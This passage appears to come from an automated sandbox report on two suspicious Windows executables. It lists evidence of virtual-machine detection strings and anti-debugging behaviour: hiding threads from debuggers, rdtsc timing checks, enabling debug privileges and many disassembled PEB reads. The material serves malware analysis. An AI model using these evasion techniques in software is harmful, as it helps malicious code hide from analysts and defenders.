Source: explorer.exe, 0000000E.00000000.47877168581.000000000D21C000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47779130675.000000000D21C000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.48061967346.000000000D21C000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47825346643.000000000D21C000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW@
Source: Zr26f1rL6r.exe, 00000002.00000002.47313677308.0000000003289000.00000004.00000001.sdmp, Zr26f1rL6r.exe, 0000000A.00000002.47941584384.00000000025B9000.00000004.00000001.sdmp, c8ahotgz8h.exe, 00000016.00000002.51082515564.0000000003279000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001A.00000002.51210974523.0000000003279000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001B.00000002.51292888312.0000000003269000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001C.00000002.51537553719.0000000002629000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001D.00000002.51664137281.0000000002499000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001E.00000002.51743441994.0000000002559000.00000004.00000001.sdmp Binary or memory string: Hyper-V Guest Service Interface
Source: c8ahotgz8h.exe, 0000001E.00000002.51743441994.0000000002559000.00000004.00000001.sdmp Binary or memory string: vmicheartbeat

Anti Debugging:

Hides threads from debuggers
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Thread information set: HideFromDebugger
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Thread information set: HideFromDebugger
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Thread information set: HideFromDebugger
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Thread information set: HideFromDebugger
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Thread information set: HideFromDebugger
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Thread information set: HideFromDebugger
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Thread information set: HideFromDebugger
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 2_2_0232045A rdtsc 2_2_0232045A
Enables debug privileges
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Process token adjusted: Debug
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 2_2_0231F3CA mov eax, dword ptr fs:[00000030h] 2_2_0231F3CA
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 2_2_02321490 mov eax, dword ptr fs:[00000030h] 2_2_02321490
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 2_2_0231FCC1 mov eax, dword ptr fs:[00000030h] 2_2_0231FCC1
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8EAE89 mov eax, dword ptr fs:[00000030h] 10_2_1E8EAE89
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8EAE89 mov eax, dword ptr fs:[00000030h] 10_2_1E8EAE89
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8EBE80 mov eax, dword ptr fs:[00000030h] 10_2_1E8EBE80
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8FCEA0 mov eax, dword ptr fs:[00000030h] 10_2_1E8FCEA0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E980EAD mov eax, dword ptr fs:[00000030h] 10_2_1E980EAD
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E980EAD mov eax, dword ptr fs:[00000030h] 10_2_1E980EAD
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8F2EB8 mov eax, dword ptr fs:[00000030h] 10_2_1E8F2EB8
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8F2EB8 mov eax, dword ptr fs:[00000030h] 10_2_1E8F2EB8
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8D1EB2 mov ecx, dword ptr fs:[00000030h] 10_2_1E8D1EB2
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8D1EB2 mov ecx, dword ptr fs:[00000030h] 10_2_1E8D1EB2
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8D1EB2 mov eax, dword ptr fs:[00000030h] 10_2_1E8D1EB2
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8D1EB2 mov ecx, dword ptr fs:[00000030h] 10_2_1E8D1EB2
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8D1EB2 mov ecx, dword ptr fs:[00000030h] 10_2_1E8D1EB2
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8D1EB2 mov eax, dword ptr fs:[00000030h] 10_2_1E8D1EB2
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8D1EB2 mov ecx, dword ptr fs:[00000030h] 10_2_1E8D1EB2
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8D1EB2 mov ecx, dword ptr fs:[00000030h] 10_2_1E8D1EB2
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8D1EB2 mov eax, dword ptr fs:[00000030h] 10_2_1E8D1EB2
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8D1EB2 mov ecx, dword ptr fs:[00000030h] 10_2_1E8D1EB2
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8D1EB2 mov ecx, dword ptr fs:[00000030h] 10_2_1E8D1EB2
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8D1EB2 mov eax, dword ptr fs:[00000030h] 10_2_1E8D1EB2
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E94CED0 mov ecx, dword ptr fs:[00000030h] 10_2_1E94CED0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E901ED8 mov eax, dword ptr fs:[00000030h] 10_2_1E901ED8
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E989ED2 mov eax, dword ptr fs:[00000030h] 10_2_1E989ED2
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E947EC3 mov eax, dword ptr fs:[00000030h] 10_2_1E947EC3
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E947EC3 mov ecx, dword ptr fs:[00000030h] 10_2_1E947EC3
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E994EC1 mov eax, dword ptr fs:[00000030h] 10_2_1E994EC1
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8FBED0 mov eax, dword ptr fs:[00000030h] 10_2_1E8FBED0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8F1EED mov eax, dword ptr fs:[00000030h] 10_2_1E8F1EED
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8F1EED mov eax, dword ptr fs:[00000030h] 10_2_1E8F1EED
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8F1EED mov eax, dword ptr fs:[00000030h] 10_2_1E8F1EED
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8C2EE8 mov eax, dword ptr fs:[00000030h] 10_2_1E8C2EE8
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8C2EE8 mov eax, dword ptr fs:[00000030h] 10_2_1E8C2EE8
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8C2EE8 mov eax, dword ptr fs:[00000030h] 10_2_1E8C2EE8
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8C2EE8 mov eax, dword ptr fs:[00000030h] 10_2_1E8C2EE8
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E963EFC mov eax, dword ptr fs:[00000030h] 10_2_1E963EFC
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8C3EE2 mov eax, dword ptr fs:[00000030h] 10_2_1E8C3EE2
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E97EEE7 mov eax, dword ptr fs:[00000030h] 10_2_1E97EEE7
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8BCEF0 mov eax, dword ptr fs:[00000030h] 10_2_1E8BCEF0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8BCEF0 mov eax, dword ptr fs:[00000030h] 10_2_1E8BCEF0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8BCEF0 mov eax, dword ptr fs:[00000030h] 10_2_1E8BCEF0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8BCEF0 mov eax, dword ptr fs:[00000030h] 10_2_1E8BCEF0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8BCEF0 mov eax, dword ptr fs:[00000030h] 10_2_1E8BCEF0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8BCEF0 mov eax, dword ptr fs:[00000030h] 10_2_1E8BCEF0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E93FE1F mov eax, dword ptr fs:[00000030h] 10_2_1E93FE1F
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E93FE1F mov eax, dword ptr fs:[00000030h] 10_2_1E93FE1F
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E93FE1F mov eax, dword ptr fs:[00000030h] 10_2_1E93FE1F
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E93FE1F mov eax, dword ptr fs:[00000030h] 10_2_1E93FE1F
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8C6E00 mov eax, dword ptr fs:[00000030h] 10_2_1E8C6E00
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8C6E00 mov eax, dword ptr fs:[00000030h] 10_2_1E8C6E00
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8C6E00 mov eax, dword ptr fs:[00000030h] 10_2_1E8C6E00
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8C6E00 mov eax, dword ptr fs:[00000030h] 10_2_1E8C6E00
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8C3E01 mov eax, dword ptr fs:[00000030h] 10_2_1E8C3E01
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8BBE18 mov ecx, dword ptr fs:[00000030h] 10_2_1E8BBE18
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8C3E14 mov eax, dword ptr fs:[00000030h] 10_2_1E8C3E14
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8C3E14 mov eax, dword ptr fs:[00000030h] 10_2_1E8C3E14
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8C3E14 mov eax, dword ptr fs:[00000030h] 10_2_1E8C3E14
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8F8E15 mov eax, dword ptr fs:[00000030h] 10_2_1E8F8E15
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E994E03 mov eax, dword ptr fs:[00000030h] 10_2_1E994E03
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E956E30 mov eax, dword ptr fs:[00000030h] 10_2_1E956E30
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E956E30 mov eax, dword ptr fs:[00000030h] 10_2_1E956E30
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E955E30 mov eax, dword ptr fs:[00000030h] 10_2_1E955E30
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E955E30 mov ecx, dword ptr fs:[00000030h] 10_2_1E955E30
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E955E30 mov eax, dword ptr fs:[00000030h] 10_2_1E955E30
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E955E30 mov eax, dword ptr fs:[00000030h] 10_2_1E955E30
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E955E30 mov eax, dword ptr fs:[00000030h] 10_2_1E955E30
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E955E30 mov eax, dword ptr fs:[00000030h] 10_2_1E955E30
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8FCE3F mov eax, dword ptr fs:[00000030h] 10_2_1E8FCE3F
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8C2E32 mov eax, dword ptr fs:[00000030h] 10_2_1E8C2E32
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E988E26 mov eax, dword ptr fs:[00000030h] 10_2_1E988E26
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E988E26 mov eax, dword ptr fs:[00000030h] 10_2_1E988E26
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E988E26 mov eax, dword ptr fs:[00000030h] 10_2_1E988E26
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E988E26 mov eax, dword ptr fs:[00000030h] 10_2_1E988E26
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E93DE50 mov eax, dword ptr fs:[00000030h] 10_2_1E93DE50
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E93DE50 mov eax, dword ptr fs:[00000030h] 10_2_1E93DE50
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E93DE50 mov ecx, dword ptr fs:[00000030h] 10_2_1E93DE50
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E93DE50 mov eax, dword ptr fs:[00000030h] 10_2_1E93DE50
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E93DE50 mov eax, dword ptr fs:[00000030h] 10_2_1E93DE50
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8EEE48 mov eax, dword ptr fs:[00000030h] 10_2_1E8EEE48
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8BFE40 mov eax, dword ptr fs:[00000030h] 10_2_1E8BFE40
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8BAE40 mov eax, dword ptr fs:[00000030h] 10_2_1E8BAE40
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8BAE40 mov eax, dword ptr fs:[00000030h] 10_2_1E8BAE40
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8BAE40 mov eax, dword ptr fs:[00000030h] 10_2_1E8BAE40
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8BDE45 mov eax, dword ptr fs:[00000030h] 10_2_1E8BDE45
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8BDE45 mov ecx, dword ptr fs:[00000030h] 10_2_1E8BDE45
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8BBE60 mov eax, dword ptr fs:[00000030h] 10_2_1E8BBE60
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8BBE60 mov eax, dword ptr fs:[00000030h] 10_2_1E8BBE60
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E97EE78 mov eax, dword ptr fs:[00000030h] 10_2_1E97EE78
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E970E6D mov eax, dword ptr fs:[00000030h] 10_2_1E970E6D
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E970E6D mov eax, dword ptr fs:[00000030h] 10_2_1E970E6D
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E970E6D mov eax, dword ptr fs:[00000030h] 10_2_1E970E6D
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E970E6D mov eax, dword ptr fs:[00000030h] 10_2_1E970E6D
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E970E6D mov eax, dword ptr fs:[00000030h] 10_2_1E970E6D
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E970E6D mov eax, dword ptr fs:[00000030h] 10_2_1E970E6D
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E970E6D mov eax, dword ptr fs:[00000030h] 10_2_1E970E6D
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E970E6D mov eax, dword ptr fs:[00000030h] 10_2_1E970E6D
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E970E6D mov eax, dword ptr fs:[00000030h] 10_2_1E970E6D
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E970E6D mov eax, dword ptr fs:[00000030h] 10_2_1E970E6D
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E970E6D mov eax, dword ptr fs:[00000030h] 10_2_1E970E6D
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E970E6D mov eax, dword ptr fs:[00000030h] 10_2_1E970E6D
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E970E6D mov eax, dword ptr fs:[00000030h] 10_2_1E970E6D
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E970E6D mov eax, dword ptr fs:[00000030h] 10_2_1E970E6D
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E994E62 mov eax, dword ptr fs:[00000030h] 10_2_1E994E62
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8C1E70 mov eax, dword ptr fs:[00000030h] 10_2_1E8C1E70
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8F7E71 mov eax, dword ptr fs:[00000030h] 10_2_1E8F7E71
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8FCE70 mov eax, dword ptr fs:[00000030h] 10_2_1E8FCE70
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8D0F90 mov eax, dword ptr fs:[00000030h] 10_2_1E8D0F90
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8D0F90 mov ecx, dword ptr fs:[00000030h] 10_2_1E8D0F90
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8D0F90 mov eax, dword ptr fs:[00000030h] 10_2_1E8D0F90
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8D0F90 mov eax, dword ptr fs:[00000030h] 10_2_1E8D0F90
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8D0F90 mov eax, dword ptr fs:[00000030h] 10_2_1E8D0F90
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8D0F90 mov eax, dword ptr fs:[00000030h] 10_2_1E8D0F90
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8D0F90 mov eax, dword ptr fs:[00000030h] 10_2_1E8D0F90
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8D0F90 mov eax, dword ptr fs:[00000030h] 10_2_1E8D0F90
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8D0F90 mov eax, dword ptr fs:[00000030h] 10_2_1E8D0F90
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8D0F90 mov eax, dword ptr fs:[00000030h] 10_2_1E8D0F90
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8D0F90 mov eax, dword ptr fs:[00000030h] 10_2_1E8D0F90
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8D0F90 mov eax, dword ptr fs:[00000030h] 10_2_1E8D0F90
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8D0F90 mov eax, dword ptr fs:[00000030h] 10_2_1E8D0F90
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8EBF93 mov eax, dword ptr fs:[00000030h] 10_2_1E8EBF93
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E948F8B mov eax, dword ptr fs:[00000030h] 10_2_1E948F8B
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E948F8B mov eax, dword ptr fs:[00000030h] 10_2_1E948F8B
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E948F8B mov eax, dword ptr fs:[00000030h] 10_2_1E948F8B
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8C1FAA mov eax, dword ptr fs:[00000030h] 10_2_1E8C1FAA
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8F8FBC mov eax, dword ptr fs:[00000030h] 10_2_1E8F8FBC
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8C4FB6 mov eax, dword ptr fs:[00000030h] 10_2_1E8C4FB6
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8ECFB0 mov eax, dword ptr fs:[00000030h] 10_2_1E8ECFB0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8ECFB0 mov eax, dword ptr fs:[00000030h] 10_2_1E8ECFB0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E97EFD3 mov eax, dword ptr fs:[00000030h] 10_2_1E97EFD3
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E93FFDC mov eax, dword ptr fs:[00000030h] 10_2_1E93FFDC
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E93FFDC mov eax, dword ptr fs:[00000030h] 10_2_1E93FFDC
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E93FFDC mov eax, dword ptr fs:[00000030h] 10_2_1E93FFDC
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E93FFDC mov ecx, dword ptr fs:[00000030h] 10_2_1E93FFDC
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E93FFDC mov eax, dword ptr fs:[00000030h] 10_2_1E93FFDC
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E93FFDC mov eax, dword ptr fs:[00000030h] 10_2_1E93FFDC
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8B9FD0 mov eax, dword ptr fs:[00000030h] 10_2_1E8B9FD0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E941FC9 mov eax, dword ptr fs:[00000030h] 10_2_1E941FC9
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E941FC9 mov eax, dword ptr fs:[00000030h] 10_2_1E941FC9
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E941FC9 mov eax, dword ptr fs:[00000030h] 10_2_1E941FC9
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E941FC9 mov eax, dword ptr fs:[00000030h] 10_2_1E941FC9
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E941FC9 mov eax, dword ptr fs:[00000030h] 10_2_1E941FC9
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E941FC9 mov eax, dword ptr fs:[00000030h] 10_2_1E941FC9
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E941FC9 mov eax, dword ptr fs:[00000030h] 10_2_1E941FC9
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E941FC9 mov eax, dword ptr fs:[00000030h] 10_2_1E941FC9
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E941FC9 mov eax, dword ptr fs:[00000030h] 10_2_1E941FC9
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E941FC9 mov eax, dword ptr fs:[00000030h] 10_2_1E941FC9
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E941FC9 mov eax, dword ptr fs:[00000030h] 10_2_1E941FC9
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E941FC9 mov eax, dword ptr fs:[00000030h] 10_2_1E941FC9
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E941FC9 mov eax, dword ptr fs:[00000030h] 10_2_1E941FC9
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E941FC9 mov eax, dword ptr fs:[00000030h] 10_2_1E941FC9
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E941FC9 mov eax, dword ptr fs:[00000030h] 10_2_1E941FC9
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E994FFF mov eax, dword ptr fs:[00000030h] 10_2_1E994FFF
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8D6FE0 mov eax, dword ptr fs:[00000030h] 10_2_1E8D6FE0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8D6FE0 mov ecx, dword ptr fs:[00000030h] 10_2_1E8D6FE0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8D6FE0 mov ecx, dword ptr fs:[00000030h] 10_2_1E8D6FE0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8D6FE0 mov eax, dword ptr fs:[00000030h] 10_2_1E8D6FE0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8D6FE0 mov ecx, dword ptr fs:[00000030h] 10_2_1E8D6FE0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8D6FE0 mov ecx, dword ptr fs:[00000030h] 10_2_1E8D6FE0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8D6FE0 mov eax, dword ptr fs:[00000030h] 10_2_1E8D6FE0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8D6FE0 mov eax, dword ptr fs:[00000030h] 10_2_1E8D6FE0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8D6FE0 mov eax, dword ptr fs:[00000030h] 10_2_1E8D6FE0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8D6FE0 mov eax, dword ptr fs:[00000030h] 10_2_1E8D6FE0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8D6FE0 mov eax, dword ptr fs:[00000030h] 10_2_1E8D6FE0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8D6FE0 mov eax, dword ptr fs:[00000030h] 10_2_1E8D6FE0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8D6FE0 mov eax, dword ptr fs:[00000030h] 10_2_1E8D6FE0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8D6FE0 mov eax, dword ptr fs:[00000030h] 10_2_1E8D6FE0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8D6FE0 mov eax, dword ptr fs:[00000030h] 10_2_1E8D6FE0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8D6FE0 mov eax, dword ptr fs:[00000030h] 10_2_1E8D6FE0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8D6FE0 mov eax, dword ptr fs:[00000030h] 10_2_1E8D6FE0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8D6FE0 mov eax, dword ptr fs:[00000030h] 10_2_1E8D6FE0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8E8FFB mov eax, dword ptr fs:[00000030h] 10_2_1E8E8FFB
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8FBF0C mov eax, dword ptr fs:[00000030h] 10_2_1E8FBF0C
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8FBF0C mov eax, dword ptr fs:[00000030h] 10_2_1E8FBF0C
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8FBF0C mov eax, dword ptr fs:[00000030h] 10_2_1E8FBF0C
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E994F1D mov eax, dword ptr fs:[00000030h] 10_2_1E994F1D
